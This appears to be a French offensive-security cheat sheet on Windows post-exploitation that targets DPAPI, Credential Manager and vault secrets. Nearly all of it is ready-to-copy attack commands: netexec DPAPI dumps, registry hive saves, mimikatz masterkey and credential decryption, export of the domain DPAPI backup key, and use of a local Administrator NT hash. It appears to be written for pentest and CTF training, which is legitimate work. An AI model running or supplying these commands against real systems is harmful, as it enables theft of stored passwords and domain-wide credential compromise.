Post-Exploitation

DPAPI & Credential Manager

Masterkeys, Credential Manager et vault Windows : du blob chiffré au secret en clair, avec ou sans mot de passe.

Collecte des blobs

Copy command
nxc smb $TARGET -u $USER -p $PASS --dpapi

Description: Dump automatique : masterkeys + secrets déchiffrés en une commande (Credential Manager, certificats, Wi-Fi, etc.).

Copy command
reg save HKLM\SECURITY security.hive & reg save HKLM\SYSTEM system.hive

Description: Manuel : la SECURITY hive contient la clé DPAPI machine (LSA secret DPAPI_SYSTEM), nécessaire pour déchiffrer les masterkeys des comptes de service/machine.

Copy command
dir /a %APPDATA%\Microsoft\Protect\%SID% & dir /a %LOCALAPPDATA%\Microsoft\Credentials

Description: Emplacements clés : masterkeys utilisateur (Protect\SID) et blobs Credential Manager (Credentials), chacun chiffré avec une masterkey différente.

Déchiffrement local (mot de passe connu)

Copy command
mimikatz # dpapi::masterkey /in:$MASTERKEY_FILE /sid:$SID /password:$PASS /protected

Description: Déchiffre la masterkey avec le mot de passe du compte (dérivation SHA1/PBKDF2 selon la version Windows).

Copy command
mimikatz # dpapi::cred /in:$CRED_BLOB /masterkey:$MASTERKEY_CLEAR

Description: Une fois la masterkey en clair obtenue, déchiffre n'importe quel blob (Credential Manager, RDCMan.settings, vault).

Domain Backup Key (sans mot de passe)

Copy command
mimikatz # lsadump::backupkeys /system:$DC /export

Description: Depuis le DC (Domain Admin requis) : exporte la clé privée RSA de backup DPAPI du domaine, capable de déchiffrer la masterkey de N'IMPORTE QUEL utilisateur du domaine sans connaître son mot de passe.

Copy command
mimikatz # dpapi::masterkey /in:$MASTERKEY_FILE /pvk:$DOMAIN_BACKUP_KEY.pvk

Description: Casse la masterkey de n'importe quel compte de domaine avec la clé de backup exportée : la cible n'a même pas besoin d'être en ligne.

Copy command
nxc smb $DC -u Administrator -H $NTHASH --local-auth --dpapi

Description: Cas fréquent en pratique : un hash Administrator LOCAL (SAM, pas domaine) suffit pour déchiffrer le vault DPAPI de la machine, y compris des credentials de comptes de domaine qui s'y sont connectés (vu en conditions réelles sur HTB Pro Lab Tengu).